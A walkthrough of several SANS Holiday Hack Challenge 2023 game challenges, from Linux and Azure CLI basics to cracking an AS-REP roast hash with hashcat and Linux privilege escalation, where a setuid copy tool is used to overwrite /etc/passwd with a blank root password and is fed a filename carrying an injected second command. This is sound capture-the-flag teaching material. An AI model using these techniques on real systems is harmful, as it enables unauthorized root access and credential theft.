SANS Holiday Hack Challenge 2023

This is a walk-through for some challenges of the SANS Holiday Hack Challenge 2023.

This year, Santa and the elves have moved to an island archipelago near the equator in the Pacific Ocean. On these Geese Islands, Santa’s team is using a new Artificial Intelligence tool called ChatNPT to prepare for the annual gift-giving extravaganza. The elves need your help in making sure that they apply ChatNPT appropriately. To that end, we recommend that you set up and use your own free account in OpenAI’s ChatGPT, Google’s Bard, or Microsoft’s Bing AI tools to help you solve challenges while learning vital cybersecurity lessons.

Useful Links

The 2023 SANS Holiday Hack Challenge (SANS)
SANS Holiday Hack Challenge 2023 (Holiday Hack)
Status page (Holiday Hack)
KringleCon (Youtube)

Challenges

Island	Dock	Challenges & Treasures
Christmas Island	Orientation	Holiday Hack Orientation
	Frosty’s Beach	Snowball Fight Linux 101, Santa’s Surf Shack
	Rudolf’s Rest	Reportinator Azure 101 Also visit the Resort Lobby
Island of Misfit Toys	Scaredy-Kite Heights	Hashcat Linux PrivEsc, Ostrich Saloon
	Squarewheel Yard	BONUS! Fishing Guide
	Tarnished Trove	Treasure: Elf the Dwarf’s, Gloriously, Unfinished, Adventure! – Vol1
Film Noir Island	?
	?
	The Blacklight District	Phish Detection Agency
Pixel Island	Rainraster Cliffs	Elf Hunt Certificate SSHenanigans
	Driftbit Grotto	Item: Game Boy Cartrige Detector Treasure: Elf the Dwarf’s, Gloriously, Unfinished, Adventure! Vol2
Steampunk Island	Brass Bouy Port	Faster Lock Combination The Captain’s Comms
	Coggoggle Marina
	Rusty Quay	Treasure: Elf the Dwarf’s, Gloriously, Unfinished, Adventure! – Vol3
Space Island	Spaceport Point	Space Island Door Access Speaker
	Cape Cosmic
	?

Challenges

Christmas Island

Holiday Hack Orientation

Difficulty: 1/5, Dock: Orientation

Talk to Jingle Ringford on Christmas Island and get your bearings at Geese Islands

💡 To navigate your ship, use keyboard arrows or WASD. Press and hold spacebar to deploy the anchor brake.

Navigate your ship to the Orientation Dock.
Click on Dock Now beside the Christmas Island: Orientation.
Click on Jingle Ringford to talk to him. Click on him many times to get the full instructions.
Click on the fishing pole then again on Jingle Ringford.
Click on the Cranberry pie terminal. Click on the upper pan of the terminal and enter “answer”.
Click on Jingle Ringford to complete this objective.

Go back to your boat, click on the anchor and sail to Frosty’s Beach. Click on Santa.

Snowball Fight

Difficulty: 2/5, Dock: Frosty’s Beach

Visit Christmas Island and talk to Morcel Nougat about this great new game. Team up with another player and show Morcel how to win against Santa!

Talk with Marcel Nougat. Marcel hints us as finding a way to play solo with client side variables or parameters, and also to make the elves’ snowballs do no damage and all kinds of other shenanigans. There is also a hint about selecting the right context when using iframes.
Click on Snowball Hero.

Right-click on the page and click Inspect. The game is embedded within an iframe:

<iframe title="challenge" src="https://hhc23-snowball.holidayhackchallenge.com?&challenge=snowballhero&username=<USERNAME>&id=04e6cabc-138c-49d1-9ba9-1de2d674d024&area=ci-frostysbeach&location=28,13&tokens=&dna=ATATATTAATATATATATATTAGCATATATATTATAGCTAATATATATATATTATAATATATATATATGCATATATTAGCATATATATATATTAGCATATATATATATTAATATATTAAT"></iframe>

Playing solo

Copy the URL from the iframe and open it in a new browser tab.
Chose mode “VS SANTA” and click “2. CREATE PRIVATE ROOM”.
New parameters will be added to the URL. Edit the URL to change “singlePlayer=false” to “singlePlayer=true”.
Replace the URL in the iframe with this new URL. You need to be within the iframe to complete the objective.

https://hhc23-snowball.holidayhackchallenge.com/room/?username=<USERNAME>&roomId=1e9b8451&roomType=private&gameType=co-op&id=04e6cabc-138c-49d1-9ba9-1de2d674d024&dna=ATATATTAATATATATATATTAGCATATATATTATAGCTAATATATATATATTATAATATATATATATGCATATATTAGCATATATATATATTAGCATATATATATATTAATATATTAAT&singlePlayer=true

Winning the game

Click on Ready. You can stay behind your dwarf ally until Santa arrives. It is possible to win the game solo.

If you want to make changes to the JavaScript file phaser.min.js (with Google Chrome):

Right-click on the page and click Inspect.
Click on the Sources tab within the Dev Tools.
Locate phaser.min.js under room.
Right-click on phaser.min.js and select Override content. Choose any folder.
Open a new tab and go to “chrome://version//inspect/#device”.
Click Allow to allow Chrome to access the folder.

When you are victorious, go talk to Morcel Nougat again.

Linux 101

Difficulty 1/5, Dock: Frosty’s Beach, Santa’s Surf Shack.

Visit Ginger Breddie in Santa’s Shack on Christmas Island to help him with some basic Linux tasks. It’s in the southwest corner of Frosty’s Beach.

Click on Santa’s Surf Shack.
Talk with Ginger Breddie.
Click on the cranberry pie terminal Linux 101.

The North Pole 🎁 Present Maker:
All the presents on this system have been stolen by trolls. Capture trolls by following instructions here and 🎁’s will appear in the green bar below. Run the command “hintme” to receive a hint.

# Type "yes" to begin:
yes

# Perform a directory listing of your home directory to find a troll and retrieve a present!
ls
HELP  troll_19315479765589239  workshop

# Now find the troll inside the troll.
grep troll troll_19315479765589239
troll_24187022596776786

# Great, now remove the troll in your home directory.
rm troll_19315479765589239

# Print the present working directory using a command.
pwd
/home/elf

# Good job but it looks like another troll hid itself in your home directory. Find the hidden troll!
ls -la
.troll_5074624024543078

# Excellent, now find the troll in your command history.
history

# Find the troll in your environment variables.
export

# Next, head into the workshop.
cd workshop

# A troll is hiding in one of the workshop toolboxes. Use "grep" while ignoring case to find which toolbox the troll is in.
grep -Ri troll ./
./toolbox_191.txt:tRoLl.4056180441832623

# A troll is blocking the present_engine from starting. Run the present_engine binary to retrieve this troll.
chmod u+x present_engine
./present_engine

# Trolls have blown the fuses in /home/elf/workshop/electrical. cd into electrical and rename blown_fuse0 to fuse0.
cd /home/elf/workshop/electrical
mv blown_fuse0 fuse0

# Now, make a symbolic link (symlink) named fuse1 that points to fuse0
ln -s fuse0 fuse1

# Make a copy of fuse1 named fuse2.
cp fuse1 fuse2

# We need to make sure trolls don't come back. Add the characters "TROLL_REPELLENT" into the file fuse2.
echo TROLL_REPELLENT >> fuse2

# Find the troll somewhere in /opt/troll_den.
find /opt/troll_den -iname troll*

# Find the file somewhere in /opt/troll_den that is owned by the user troll.
find /opt/troll_den -user troll

# Find the file created by trolls that is greater than 108 kilobytes and less than 110 kilobytes located somewhere in /opt/troll_den.
find /opt/troll_den -size +108

# List running processes to find another troll.
ps -ef

# The 14516_troll process is listening on a TCP port. Use a command to have the only listening port display to the screen.
netstat -antp

# The service listening on port 54321 is an HTTP server. Interact with this server to retrieve the last troll.
curl "http://127.0.0.1:54321"

# Your final task is to stop the 14516_troll process to collect the remaining presents.
kill 29175

# Type "exit" to close…
exit

Talk to Ginger Breddie. Go back to your boat, click on the anchor and sail to Rudolph’s Rest.

Reportinator

Difficulty: 2/5, Dock: Rudolf’s Rest

Noel Boetie used ChatNPT to write a pentest report. Go to Christmas Island and help him clean it up.

Talk with Noel Boetie.

I need some guidance in finding any errors in the way it generated the content, especially those odd hallucinations in the LLM output.

Inspect requests using Burp Suite. Submit the report and send the request to the Intruder module. Try all possible combinations of 9 variables with 0 or 1 (2^9 = 512) using Burp’s Intruder module. Use attack type Cluster bomb. For each payload, use simple list of “0” and “1”.

POST /check HTTP/2
Host: hhc23-reportinator-dot-holidayhack2023.ue.r.appspot.com
[...]

input-1=§1§&input-2=§0§&input-3=§0§&input-4=§0§&input-5=§0§&input-6=§0§&input-7=§0§&input-8=§0§&input-9=§0§

We find that this payload is successful.

POST /check HTTP/2
Host: hhc23-reportinator-dot-holidayhack2023.ue.r.appspot.com
[...]

input-1=0&input-2=0&input-3=1&input-4=0&input-5=0&input-6=1&input-7=0&input-8=0&input-9=1

HTTP/2 200 OK
Content-Type: application/json
Vary: Accept-Encoding
Vary: Cookie
X-Cloud-Trace-Context: a28ae217d9dfcfa1cbb39d53dc4738ff;o=1
Date: Mon, 11 Dec 2023 16:33:01 GMT
Server: Google Frontend
Cache-Control: private
Content-Length: 128
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000

{"hash":"6b76ce3163d721756b73a248386e7c8503e5b3f84c558184626214e6198a45d7","resourceId":"1d7107cf-32fd-4c07-b030-5183fabead5e"}

Input 3, 6 and 9 are false positives.

1. Vulnerable Active Directory Certificate Service-Certificate Template Allows Group/User Privilege Escalation	Legitimate finding
2. SQL Injection Vulnerability in Java Application	Legitimate finding
3. Remote Code Execution via Java Deserialization of Stored Database Objects	False positive
4. Azure Function Application-SSH Configuration Key Signing Vulnerable to Principal Manipulation	Legitimate finding
5. Azure Key Vault-Overly Permissive Access from Azure Virtual Machine Metadata Service/Managed Identity	Legitimate finding
6. Stored Cross-Site Scripting Vulnerabilities	False positive
7. Browsable Directory Structure	Legitimate finding
8. Deprecated Version of PHP Scripting Language	Legitimate finding
9. Internal IP Address Disclosure	False positive

Penetration test report

Azure 101

Difficulty: 2/5, Dock: Rudolf’s Rest

Help Sparkle Redberry with some Azure command line skills. Find the elf and the terminal on Christmas Island.

Talk with Sparkle Redberry.

Alabaster sent us this Azure CLI reference as well. It’s super handy, he said. Honestly, it just confuses me even more.

Click on the Azure 101 cranberry pie terminal.

#You may not know this but the Azure cli help messages are very easy to access. First, try typing: az help | less
az help

# Next, you've already been configured with credentials.
# Use 'az' and your 'account' to 'show' your current details and make sure to pipe
# to less ( | less )
az account show

elf@f634d875932b:~$ az account show
{
  "environmentName": "AzureCloud",
  "id": "2b0942f3-9bca-484b-a508-abdae2db5e64",
  "isDefault": true,
  "name": "northpole-sub",
  "state": "Enabled",
  "tenantId": "90a38eda-4006-4dd5-924c-6ca55cacc14d",
  "user": {
    "name": "northpole@northpole.invalid",
    "type": "user"
  }
}

# Excellent! Now get a list of resource groups in Azure.
# For more information:
# https://learn.microsoft.com/en-us/cli/azure/group?view=azure-cli-latest
az group list

# Ok, now use one of the resource groups to get a list of function apps.
# For more information:
# https://learn.microsoft.com/en-us/cli/azure/functionapp?view=azure-cli-latest
# Note: Some of the information returned from this command relates to other cloud
# assets used by Santa and his elves.
az functionapp list --resource-group northpole-rg1

# Find a way to list the only VM in one of the resource groups you have access to.
# For more information:
# https://learn.microsoft.com/en-us/cli/azure/vm?view=azure-cli-latest
az vm list --resource-group northpole-rg2

# Find a way to invoke a run-command against the only Virtual Machine (VM) 
# so you can RunShellScript and get a directory listing to reveal a file on the
# Azure VM.
# For more information:
# https://learn.microsoft.com/en-us/cli/azure/vm/run-command?view=azure-cli-latest#az-vm-run-command-invoke
az vm run-command invoke -n NP-VM1 --resource-group northpole-rg2 --command-id RunShellScript --scripts "ls -la"

Great, you did it all!

Talk with Sparkle Redberry.

That Azure Function App URL you came across in the terminal looked interesting.
Sparkle Redberry

This unlocks the Certificate SSHenanigans challenge (Difficulty: 5/5) on Pixel Island.

Resort Lobby

Dock: Rudolf’s Rest

Go to the resort’s lobby. Talk with Pepper Minstix.

After you complete all the challenges, come back here for a surprise!
Pepper Minstix

Island of Misfit Toys

Hashcat

Difficulty: 2/5, Dock: Scaredy-Kite Heights

Eve Snowshoes is trying to recover a password. Head to the Island of Misfit Toys and take a crack at it!

Talk with Eve Snowshoes.

Our dear Alabaster forgot his password. He’s been racking his jingle bells of memory with no luck.

[…] So, what do you say, chief, ready to get your hands on some hashcat action and help a distraught elf out?

Click on the Hashcat cranberry pie terminal.

Hidden deep in the snow is a kerberos token,
Its type and form, in whispers, spoken.
From reindeers’ leaps to the elfish toast,
Might the secret be in an ASREP roast?

hashcat, your reindeer, so spry and true,
Will leap through hashes, bringing answers to you.
But heed this advice to temper your pace,
-w 1 -u 1 --kernel-accel 1 --kernel-loops 1, just in case.

[…]

Determine the hash type in hash.txt and perform a wordlist cracking attempt to find which password is correct and submit it to /bin/runtoanswer

From the description, the hash was obtained using the AS-REP Roasting technique. This is hash type 18200 in Hashcat.

hashcat --help | grep -i as-rep

  18200 | Kerberos 5 AS-REP etype 23                       | Network Protocols

In the home directory, there is a file hash.txt and password_list.txt. Add the –force option or you will get an error message “The manual use of the -n option (or –kernel-accel) is outdated.”.

hashcat -w 1 -u 1 --kernel-accel 1 --kernel-loops 1 --force -m 18200 -a 0 hash.txt password_list.txt

Show results.

hashcat -m 18200 hash.txt --show

$krb5asrep$23$alabaster_snowball@XMAS.LOCAL:22865a2bceeaa73227ea4021879eda02$8f07417379e610e2dcb0621462fec3675bb5a850aba31837d541e50c622dc5faee60e48e019256e466d29b4d8c43cbf5bf7264b12c21737499cfcb73d95a903005a6ab6d9689ddd2772b908fc0d0aef43bb34db66af1dddb55b64937d3c7d7e93a91a7f303fef96e17d7f5479bae25c0183e74822ac652e92a56d0251bb5d975c2f2b63f4458526824f2c3dc1f1fcbacb2f6e52022ba6e6b401660b43b5070409cac0cc6223a2bf1b4b415574d7132f2607e12075f7cd2f8674c33e40d8ed55628f1c3eb08dbb8845b0f3bae708784c805b9a3f4b78ddf6830ad0e9eafb07980d7f2e270d8dd1966:IluvC4ndyC4nes!

Submit password “IluvC4ndyC4nes!”.

/bin/runtoanswer "IluvC4ndyC4nes!"

Talk to Eve Snowshoes.

Linux PrivEsc

Difficulty: 3/5, Dock: Scaredy-Kite Heights, Ostrich Saloon

Rosemold is in Ostrich Saloon on the Island of Misfit Toys. Give her a hand with escalation for a tip about hidden islands.

Go to the Ostrich Saloon and talk with Rose Mold.

[…] Do you know much about privilege escalation techniques on Linux?

You’re asking why? How about I’ll tell you why after you help me.

And you might have to use that big brain of yours to get creative, bub.

Click on the Linux PrivESC cranberry pie terminal.

Find a method to escalate privileges inside this terminal and then run the binary in /root

Do enumeration for privilege escalation. Look for binaries that AutoElevate.

find / -perm -u=s -type f 2>/dev/null

/usr/bin/chfn
/usr/bin/chsh
/usr/bin/mount
/usr/bin/newgrp
/usr/bin/su
/usr/bin/gpasswd
/usr/bin/umount
/usr/bin/passwd
/usr/bin/simplecopy

We find interesting binary “simplecopy”.

ls -la /usr/bin/simplecopy

-rwsr-xr-x 1 root root 16952 Dec  2 22:17 /usr/bin/simplecopy

Option 1: simplecopy and /etc/passwd

Try copying a file owned by “elf” and see what permissions look like on the new file.

/usr/bin/simplecopy /home/elf/.profile /home/elf/test
ls -la /home/elf/test

-rw-r--r-- 1 root root 807 Dec 13 22:08 test

We can replace the /etc/passwd file with our own.

cp /etc/passwd /home/elf/newpasswd

Remove the ‘x’ or ‘*’ value at the place of root password. The ‘x’ value in the /etc/passwd file indicates that the actual password hash is stored in the /etc/shadow file (or a similar location), rather than in the /etc/passwd file itself. If you remove the ‘x’ value and replace it with something else or leave it blank, the root user’s password will no longer be stored securely and the system won’t be able to authenticate the root user using the stored password hash from the /etc/shadow file.

Keep the root password blank and save the /etc/passwd file.

sed 's/root:x:/root::/' /etc/passwd > /home/elf/newpasswd

/usr/bin/simplecopy /home/elf/newpasswd /etc/passwd

su -
cd /root
./runmetoanswer

There is something wrong with your environment; the most likely reason is that
the RESOURCE_ID environmental variable is missing – that can happen if you’re using sudo
or su or some other process that alters the environment. If this persists, please
ask for help!

Check environment variable RESOURCE_ID when logged as “elf”:

export

declare -x RESOURCE_ID="f2e3e797-c797-447d-8a34-bb71b96b7357"

Set this environment variable when connected as root:

export RESOURCE_ID="f2e3e797-c797-447d-8a34-bb71b96b7357"

./runmetoanswer
Who delivers Christmas presents?
[santa]

This program asks for an answer. Try to find the answer within the binary.

strings runmetoanswer

[...]
Checking...Your answer: Or enter it when prompted.
    ./runtoanswer "YourAnswerGoesHere"
[...]

The answer can be submitted as an argument.

./runmetoanswer santa

Your answer: santa

Checking....
Your answer is correct!

Option 2: simplecopy command injection

There is a command injection in simplecopy.

/usr/bin/simplecopy /home/elf/.profile "/home/elf/test; ls -la /root"

total 620
drwx------ 1 root root   4096 Dec  2 22:17 .
drwxr-xr-x 1 root root   4096 Dec 14 13:14 ..
-rw-r--r-- 1 root root   3106 Dec  5  2019 .bashrc
-rw-r--r-- 1 root root    161 Dec  5  2019 .profile
-rws------ 1 root root 612560 Nov  9 21:29 runmetoanswer

Execute the binary.

/usr/bin/simplecopy /home/elf/.profile "/home/elf/test; /root/runmetoanswer"

Go talk with Rose Mold.

To answer your question of why from earlier… Nunya!

[…]

There’s a hidden, uncharted area somewhere along the coast of this island, and there may be more around the other islands.

The area is supposed to have something on it that’s totes worth, but I hear all the bad vibe toys chill there.

BONUS! Fishing Guide

Difficulty: 1/5, Dock: Squarewheel Yard

Go talk with Poinsettia McMittens. This will unlock objective BONUS! Fishing Guide.

Catch twenty different species of fish that live around Geese Islands. When you’re done, report your findings to Poinsettia McMittens on the Island of Misfit Toys.

Perhaps there are some clues about the local aquatic life located in the HTML source code.
Hint “Become the Fish”

Right-click on the page and click Inspect. There is a comment about fish.

[...]
<!-- <a href='fishdensityref.html'>[DEV ONLY] Fish Density Reference</a> -->
[...]

By looking at the Source tab, we find a /sea directory. Access the fish density reference at:
https://2023.holidayhackchallenge.com/sea/fishdensityref.html

Extract all fish names from https://2023.holidayhackchallenge.com/sea/fishdensityref.html.

wget https://2023.holidayhackchallenge.com/sea/fishdensityref.html
grep h3 fishdensityref.html | cut -d ">" -f2 | cut -d "<" -f1 > fishes.txt

There are 171 fishes. For each fish, the image is a heatmap of its location. We can see that the “Piscis Cyberneticus Skodo” is located at a very specific location. Replace the minimap.png file in https://2023.holidayhackchallenge.com/sea/js/client.js with the heatmap to find each fish. You need to reload the page after the change.

const ImageAssets = {
[...]
    minimap: 'assets/minimap.png',
[...]
};

const ImageAssets = {
[...]
    minimap: 'assets/noise/Piscis Cyberneticus Skodo.png',
[...]
};

To check you progress, in the DevTools -> Console tab, select the “sea/” frame and enter:

playerData.fishCaught

To check for a specific fish name:

playerData.fishCaught.some(fish => fish.name === 'Piscis Cyberneticus Skodo');

You can also automate the fishing using JavaScript:

async function fishing() {
    castReelBtn.click(); // Click to cast the reel

    // Wait until the "Reel it in!" button changes color
    while (window.getComputedStyle(reelItInBtn).color === 'rgb(66, 40, 0)') {
        await new Promise(resolve => setTimeout(resolve, 100));
    }

    reelItInBtn.click(); // Click to reel in the fish
    await new Promise(resolve => setTimeout(resolve, 1000));
    closeFeeshBtn.click(); // Click to close the Pescadex
    console.log(playerData.fishCaught.length); // Display number of fishes
}

async function automateFishing(repeat) {
    for (let i = 0; i < repeat; i++) {
        await fishing();
        console.log(`Fishing iteration ${i + 1} completed.`);
        await new Promise(resolve => setTimeout(resolve, 1000));
    }

    console.log('Fishing completed.');
}

automateFishing(100); // Fishing 100 times

Move your ship to other locations (check the heatmaps) and repeat the automateFishing call to catch new fishes.

When you have all fishes (171), go to the Island of Misfit Toys – North-East of the island. Dock at Squarewheel Yard. Go talk with Poinsettia McMittens.

Treasure: Elf the Dwarf’s, Gloriously, Unfinished, Adventure! – Vol1

Dock: Tarnished Trove

Go back to your boat and find the other dock on the Island of Misfit Toys – South of the island. Dock at Tarnished Trove.

There are 3 buried treasures in total, each in its own uncharted area around Geese Islands. Use the gameboy cartridge detector and listen for the sound it makes when treasure is nearby, which gets louder the closer you are. Also look for some kind of distinguishing mark or feature, which could mark the treasure’s location.
Dusty Giftwrap

There is a hat on the Island. Find it and you will get the item Elf the Dwarf’s, Gloriously, Unfinished, Adventure! – Vol1. Go talk to Dusty Giftwrap again.

Pixel Island

Talk to Alabaster Snowball. He says to go to Steampunk Island.

Treasure: Elf the Dwarf’s, Gloriously, Unfinished, Adventure! Vol2

Dock: Driftbit Grotto

There are 3 buried treasures in total, each in its own uncharted area around Geese Islands.

[…] If you find the treasure, come back and show me, and I’ll tell you what I was able to research about it.
Tinsel Upatree

Go talk to Tinsel Upatree when you find it.

Steampunk Island

Faster Lock Combination

Difficulty: 2/5, Dock: Brass Bouy Port

Over on Steampunk Island, Bow Ninecandle is having trouble opening a padlock. Do some research and see if you can help open it!

Talk to Bow Ninecandle.

[…] I’m sure there are some clever tricks and tips floating around the web that can help us crack this code without too much of a flush… I mean fuss. […]
Bow Ninecandle

Click on Fast Lock to start the challenge. Open the DevTools. Inspect the code of the iframe. There is JavaScript code.

<script>
[...]
    function moveLockIntoUnlockedPosition() {
[...]
                    onComplete: function () {
                      checkit()
                    }
[...]
    function checkit() {
      // Function to get the query parameter by name
      function getQueryParam(param) {
        const urlParams = new URLSearchParams(window.location.search);
        return urlParams.get(param);
      }

 [...]
  </script>

Click on the Console tab. Select the paddlelockdecode frame.
Call the checkit function to complete the challenge.

checkit()

Talk to Bow Ninecandle again.

Treasure: Elf the Dwarf’s, Gloriously, Unfinished, Adventure! – Vol3

Dock: Rusty Quay

[…] Anyways, I came here to nab the treasure hidden in this ship graveyard, only to discover it’s protected by this rusted maze. […]
Angel Candysalt

At the top of the maze, there is a treasure. Go in your browser’s settings and zoom out to see the whole maze and find the item. Enter by the 2nd path on the top right. You will find Elf the Dwarf’s, Gloriously, Unfinished, Adventure! – Vol3. When you found it, go talk to Angel Candysalt again.

Rainraster Cliffs

Dock: Rainraster Cliffs

Can you go and check on Alabaster Snowball for me? He’s at Rainraster Cliffs on Pixel Island. I heard some rumors he’s been experimenting with ChatNPT again and I’m a little worried about what he’s cooking up.
Ribb Bonbowford